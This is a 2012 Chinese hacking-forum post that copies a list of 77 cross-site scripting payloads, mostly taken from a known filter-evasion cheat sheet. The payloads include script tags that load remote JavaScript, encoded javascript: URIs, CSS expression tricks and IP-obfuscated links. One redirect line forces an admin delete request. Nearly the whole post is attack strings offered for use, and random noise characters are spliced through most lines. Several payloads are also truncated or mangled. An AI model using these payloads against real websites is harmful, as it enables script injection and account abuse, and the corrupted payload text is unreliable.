找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3534|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。% H: u+ M  n* {. `" _& ~
6 Y% q3 }! ?2 b1 A! N4 G' |
(1)普通的XSS JavaScript注入
7 C  e/ p; i3 ]( v <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; R5 U+ @% t% y& Y# C9 [: K
% H& ~8 M1 v5 d) i& D (2)IMG标签XSS使用JavaScript命令3 n) x. W! d( X* v/ j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. s4 y- S6 W% T3 S$ Q: i
) Q9 b/ e$ E) Y- P
(3)IMG标签无分号无引号
2 [8 S% {# J& K2 x" a6 n <IMG SRC=javascript:alert(‘XSS’)>
% N8 d1 g, W& a7 d1 J
( l' e8 c+ T$ E% |2 F& P (4)IMG标签大小写不敏感* @8 l/ [5 r) o# \0 _
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: P. v' d9 ^; v2 @5 w4 m3 K4 n' n! G& x
(5)HTML编码(必须有分号)* }, {$ ~& [3 D# `% p9 m+ {
<IMG SRC=javascript:alert(“XSS”)>9 f4 r- [" W/ n! y1 z9 W+ p: h
; \; c# O4 Y1 V9 q! k
(6)修正缺陷IMG标签' v1 R: m3 r, l, Q& A- j2 v* v
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
: C$ F' F& O3 b: Y0 _! N& _& Z3 ~" D* F4 `  b
(7)formCharCode标签(计算器)
8 L9 l! D( B8 g <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ o+ E* g+ y5 P3 j7 F$ m! l0 A. e0 ?! a5 |
(8)UTF-8的Unicode编码(计算器)
# J7 z5 o$ W, O8 B% l6 n2 p- {' K <IMG SRC=jav..省略..S')>: _; Z' x7 o/ X
* d4 {3 c5 ?/ ?4 @! F  f
(9)7位的UTF-8的Unicode编码是没有分号的(计算器): c0 F& G# L% k9 i$ H
<IMG SRC=jav..省略..S')>
5 P6 C- I2 }2 x8 ~. ~4 Q! b4 w2 }/ K
(10)十六进制编码也是没有分号(计算器)8 m* c1 h& [  ]5 ~# l' _( S5 q
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>$ Z, s+ m2 _; V) [& L1 k8 z( o
1 v$ i6 W; @) C% h5 e7 _
(11)嵌入式标签,将Javascript分开
, B& z  N! o( |8 i- r8 s <IMG SRC=”jav ascript:alert(‘XSS’);”># ~7 A3 J0 K" s, c
+ `  v; a$ {" ?9 F
(12)嵌入式编码标签,将Javascript分开
0 C/ L( Z3 v# N <IMG SRC=”jav ascript:alert(‘XSS’);”>& l! j& D+ z# Y) }2 C) A1 s& `, ?9 O2 _
2 I! C' H  t3 A' w/ L
(13)嵌入式换行符
) Z% `- J& P' B  V8 {" k9 v <IMG SRC=”jav ascript:alert(‘XSS’);”>
/ i6 p, y3 g, w+ J/ a; K
, u5 V$ [6 H9 S+ A3 p, s  K7 H7 {# ~ (14)嵌入式回车) x: N( r/ z' d7 i4 N7 D7 V( a
<IMG SRC=”jav ascript:alert(‘XSS’);”>' d8 y) B; c( t0 x" f$ b

5 y! X( M8 y7 Z7 {5 j (15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 q  N/ u! {, ^ <IMG SRC=”javascript:alert(‘XSS‘)”>
4 j; G/ w( p6 q, w, T$ E& |$ h( Z& Q( }2 T2 E3 S( N+ ?; w
(16)解决限制字符(要求同页面); I" F. e$ N+ c7 R, K% q
<script>z=’document.’</script>' U! T5 O( G8 J; Q& L
<script>z=z+’write(“‘</script>; O1 {' ^( l+ g/ {) A! L4 W8 l2 k
<script>z=z+’<script’</script>( {# j, J2 x7 K3 `* u4 m: `6 _
<script>z=z+’ src=ht’</script>
# l+ K% V) ^) `, H! F) \ <script>z=z+’tp://ww’</script>7 p, W6 y7 e7 `+ w  T, Z
<script>z=z+’w.shell’</script>
  {/ ]" R/ D3 E# y8 l <script>z=z+’.net/1.’</script>
7 c# D- }- G) ^) H# R/ F( E6 l <script>z=z+’js></sc’</script>
2 d( t% n1 j  i3 q <script>z=z+’ript>”)’</script>
0 Q7 S% v# ~- a2 ]: N8 I: Z <script>eval_r(z)</script>7 W5 ?2 a/ z3 c! ^% t
! c0 p& q- }6 V# J
(17)空字符8 H& v# s( Q+ d8 c8 f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! N7 A! W. C, y# |* W3 e2 D" Q6 F% \
+ w* j6 M( i- C; x) h (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& d. T8 ~; c$ h9 `
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ @, C) G2 I# [' |3 `1 z" }

( T6 q, Z! [- J# m$ N: E  _/ w) ? (19)Spaces和meta前的IMG标签
( H' Z. O: K0 H* @  u <IMG SRC=”   javascript:alert(‘XSS’);”>
$ {6 m, T/ v6 G6 \1 ]. i/ p* w+ i7 Q: c
(20)Non-alpha-non-digit XSS
# u# \, i7 ?) f5 A4 W5 }; F; ~ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' s! j6 l" k" B* A0 F% u8 g
+ t8 r! N6 m6 |, T" _6 Z
(21)Non-alpha-non-digit XSS to 2
3 q$ Q: j, ~1 z <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ ?) O6 ?' z9 V; l; i

' o% C) m9 A4 }8 r. V (22)Non-alpha-non-digit XSS to 3% ?- L' Z( n8 _0 M
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& P* o$ l& I' w
6 ?/ ?0 h" f3 { (23)双开括号- i5 s! i4 x7 @* q# p
<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 {( D7 \3 h9 m8 y. x) i+ Q) D
& F, h% ~- a4 K- f, Z2 c
(24)无结束脚本标记(仅火狐等浏览器)
# r+ r$ O% I( P  ~ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& L5 q2 F% B' q, U. s# w7 ]1 A! y- `3 Z- p2 y  `
(25)无结束脚本标记26 c- w4 ^4 y" {: g. m& W) |
<SCRIPT SRC=//3w.org/XSS/xss.js>; {9 F% ^1 U! b! `7 N, T

) b3 P% E. J0 D/ M4 e (26)半开的HTML/JavaScript XSS2 o0 Y! `7 L( n3 E& Z6 b! n/ A, |
<IMG SRC=”javascript:alert(‘XSS’)”  x7 x6 l" ^0 Q  H( z) M" A
) _8 z! ?) i$ X* U
(27)双开角括号
' M& H+ {$ [% {: T) X <iframe src=http://3w.org/XSS.html </ o: E& N- N3 J

& v4 E" b4 Q5 ]( {4 h (28)无单引号 双引号 分号
6 `* Z* T! a! N; d! }" _1 A" q: M& y <SCRIPT>a=/XSS/5 W* e! [8 z9 S7 h
alert(a.source)</SCRIPT>6 m+ j# W# C6 W

$ Q5 g) W) P1 @! C4 j8 R0 R (29)换码过滤的JavaScript$ [3 U+ Z& l" d  I' ]8 s' c; i
\”;alert(‘XSS’);//
! e6 q2 }! X( C* \# p& k! h3 B
( Z  i) v, Q  k7 h7 S; d8 s9 [ (30)结束Title标签
# P0 z6 C! E6 C3 a2 d </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. `* x8 J) w& x6 N

$ w8 G( D  h: M2 u/ u (31)Input Image
+ o; \( f% m/ W/ t, W& E <INPUT SRC=”javascript:alert(‘XSS’);”>
: Q. X  }3 l) L) f' T$ O
5 q: a3 M* h' g# S1 ~) f1 x/ o/ a) E (32)BODY Image- U( r8 _. ^7 f3 v
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. l& e: K4 G/ L9 O* j' ^% _. I9 L. C9 I6 G9 p( i  X& F1 s
(33)BODY标签
# L, z3 {; t7 _8 Y2 i& k <BODY(‘XSS’)>
, e) p7 h8 m* k% ~* [4 q* q: m
- E2 ^- E0 |2 o8 ] (34)IMG Dynsrc1 [+ p$ P" |+ j& g
<IMG DYNSRC=”javascript:alert(‘XSS’)”>) n: G$ O7 K  I. ^! f: O9 s

+ ]4 a- V% X7 o1 B. m (35)IMG Lowsrc
3 S. J: Q$ F, Z/ q% z. [ <IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ I# f4 E2 K/ X) t! B0 a& H2 w' Q3 s, J" Q7 T- Y: @  P& l
(36)BGSOUND
; V6 ]% I! t9 j* s <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- U9 W; M% K: v3 h) H$ {* ^4 o. h; A- L5 y( y/ f! ?3 u
(37)STYLE sheet
! k4 t; }% U' T( ~6 Q+ g <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' B7 W" t9 I. p- [4 k% I6 I
7 s% {+ y: `* N( a1 U  h7 F (38)远程样式表; \% a* s$ n) q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; e& B9 Q- Q$ e9 }" z$ U" F- Q" ]/ M% t1 ^9 [
(39)List-style-image(列表式)7 p- q8 }. [3 y3 g3 N, ^
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 G7 W6 B% U: }6 @' N

& a& p* f2 _  s1 w (40)IMG VBscript  x1 ?; k: V/ ]/ i8 a6 D
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 j9 J& T  c& z: \5 _) B
6 \; m/ G1 ^  E- \% e! D (41)META链接url7 _6 U9 r+ J2 }# Q% a- F# L" S- v
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
; [6 H# ?( w2 S0 z; U6 R
  ?! [/ _- F, p8 O (42)Iframe
# [; E  w8 x# m) V <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# W8 b2 f# w& ]1 u6 `+ l
6 L9 h* R7 m! M" M (43)Frame5 D' Y4 x: x% l; F: B% x
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
# d* d; V3 L0 J# R( V( M, t+ o' K
9 A: Z2 I- R+ v3 ` (44)Table
8 A5 T& i7 _: w: G; ] <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, F$ O* c! t- ]6 p4 \  D/ F3 `- v& K& e9 ]! ?& S3 h
(45)TD8 t' I$ x! ]0 X+ ]9 a" R2 T3 r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>  U7 y( t, s5 G4 G' W( ?
  {5 S  e7 Q# u& A7 d$ R
(46)DIV background-image1 d% g  S, P/ `0 X" q" y, V
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. n, W; e) |9 Q6 y4 \2 M0 Z. h* n% u6 w% L
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)2 U( {( i7 s  `# u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 G& [, X  I) m' o7 X
3 w6 a" o. o) a/ t- q, H (48)DIV expression6 R9 W3 x7 n1 h% F* m3 A. b/ I8 V
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) ?! q/ h  `$ A% |, q/ x5 w
( K6 j' _# x' T3 \$ m6 V4 L- p
(49)STYLE属性分拆表达5 ?- H5 ?' u/ A8 B: K9 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>% f) j$ m9 E5 G$ A
5 F; @, T, }# n
(50)匿名STYLE(组成:开角号和一个字母开头)) X7 k# j5 Z& p" Y: S* J, G5 R- s6 y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ u7 S) e$ \3 s2 C

4 k. V" G$ n3 x  a; } (51)STYLE background-image( f- j- \) Y" s( z! u+ q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" X) ?, F  n3 t1 L& y
, ?" R* Q& a3 ^1 O8 i
(52)IMG STYLE方式0 \7 i, s5 l; \
exppression(alert(“XSS”))’>% H$ [) N$ ]) m/ T
# ^# N* R: z7 I; ^
(53)STYLE background: g( k3 p0 q% J% H- E; s/ J
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ d8 U% ^$ j% d+ u- c" G3 _, h1 b

" A4 L" r7 T' x' J! L& j" h: Z: F (54)BASE
: s' z  c, y' P9 Z1 A <BASE HREF=”javascript:alert(‘XSS’);//”># c( p6 j1 H2 Q* k" `

2 O; r4 t6 r  a8 l1 E (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# m7 u. c, o; f; D. F
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% u; b, f) q1 Q% Z

+ @/ C3 }  l4 [1 {# H, f4 c (56)在flash中使用ActionScrpt可以混进你XSS的代码
: b% x$ C" W; T  |9 V" z; h3 n; T a=”get”;: Q$ v4 ^7 M! t* N0 n9 R
b=”URL(\”";: x' R" p0 g9 S8 ?
c=”javascript:”;+ Y: L8 A& x: R) P9 `0 L8 B
d=”alert(‘XSS’);\”)”;
7 v7 e: M( I+ ?, @ eval_r(a+b+c+d);
; `3 _6 c# f, Y4 P2 z5 h
% R# q3 A. L0 l' m9 c5 U2 M (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上, U7 f# m* D9 i, S# M# g; T6 q; L: o
<HTML xmlns:xss>
" X. M/ g. [3 y6 _: ~& u8 b <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
- {0 s" @4 z" r, ~1 J0 C7 t. _5 N <xss:xss>XSS</xss:xss>
( U" M+ a  u; P4 G/ H2 ?  U </HTML>
7 f0 w* W: d5 a! T
0 g- u0 q; {* W3 d: U0 w (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 x7 ~: T( L4 n$ U: t( l8 i5 i <SCRIPT SRC=””></SCRIPT>
* N; L2 M* j  m( W: i
* \" S: \/ V% F7 z$ E (59)IMG嵌入式命令,可执行任意命令
9 s6 H8 V+ Y4 k3 v& k <IMG SRC=”http://www.XXX.com/a.php?a=b”>
6 ]2 L4 {+ F) s/ I% ~( R* K4 ^  f! N6 o: Q
(60)IMG嵌入式命令(a.jpg在同服务器)
* L! f. y. U) S$ J Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 S- P, O9 i) D- I+ ~
5 ~1 y$ K) j3 \; U
(61)绕符号过滤( U  W, H8 f, h9 C; k+ h; E0 V
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 k" T# y8 w4 J6 Q6 S7 p* T5 [0 R% a0 Q. t; O/ J% F2 M& r5 `
(62)
2 E( u& L0 M9 o1 V <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 C7 J- ]" B- a6 u; ]8 R
, R0 E, I3 C" p, @
(63)
: E0 O! j; T" W; U% K1 Z <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>  V) R4 X& Z: h5 J

' a% F  s+ \! w# {( H (64)1 y; l6 z  \+ o* L* j! H/ ^
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
6 D1 n2 Y" M/ ]+ E, |7 l' l! M) G& ?& R# P
(65)9 u  g. n1 w6 I. X  t# W( B% q0 ^
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>) D. {2 E" [: l

+ \4 |! V3 x6 b3 o8 ~! B6 G (66)
( s! A. _+ f3 m4 Q. o <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># u$ n( S! w3 E

: q) `  p, _8 A, m) Y (67)! a0 |7 _: L. o1 e9 _$ i6 \
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>4 ]- m% K. f; n* C6 I; s

/ x+ {( l$ i, _$ Q" x, l6 m (68)URL绕行$ Z8 T- Y: |. a6 _  S/ r
<A HREF=”http://127.0.0.1/”>XSS</A>: |* H( |! ~+ u$ |7 v4 {

7 R: m& j  h, X! G0 | (69)URL编码! _2 H+ y4 Q3 ?
<A HREF=”http://3w.org”>XSS</A>
2 T  p" V5 j7 v' O( F7 g7 C  U* b6 s' m6 K1 {2 S
(70)IP十进制
; K; J0 i0 N0 ~3 @  d/ q <A HREF=”http://3232235521″>XSS</A>
( y7 x5 P" d2 B9 h4 w/ Q. m) H# B" _% I* k" q+ X2 p
(71)IP十六进制
' \/ N4 X- U. O$ h+ B" k <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>& [" y6 E; S. Q
6 U$ s) g9 a- a8 Q8 p
(72)IP八进制
5 V' H# D8 C8 G* m <A HREF=”http://0300.0250.0000.0001″>XSS</A>% i8 E' H0 g2 D( f
' [! Y% R: {' w4 P# I, e
(73)混合编码
: v# M& R8 g2 @: W+ v <A HREF=”h
" O9 `4 N0 N( `- a5 V tt p://6 6.000146.0×7.147/”">XSS</A>/ S! H( y7 M0 d4 S7 e+ m* Y  W; n

5 H2 ^9 T0 i9 [- n6 {# W3 b3 q (74)节省[http:]
! @( f  Q5 i5 u% y. D; G7 t6 v <A HREF=”//www.google.com/”>XSS</A>% t# W3 t2 C3 Y8 M/ u1 p  L

9 ^1 h8 q% |: b5 X (75)节省[www]
' C) c5 J5 i# B8 I- B/ _4 p <A HREF=”http://google.com/”>XSS</A>5 I9 E& `1 b$ l. ?

1 m, d1 x  z" E$ p, I& \ (76)绝对点绝对DNS
/ q. o/ p7 g7 n, n- E* q4 L0 x7 O <A HREF=”http://www.google.com./”>XSS</A>
, B3 D1 s; m& F* S* ]1 _7 S
% d1 T' `# w" L; v (77)javascript链接
4 C8 A3 J$ o. T" n- v <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表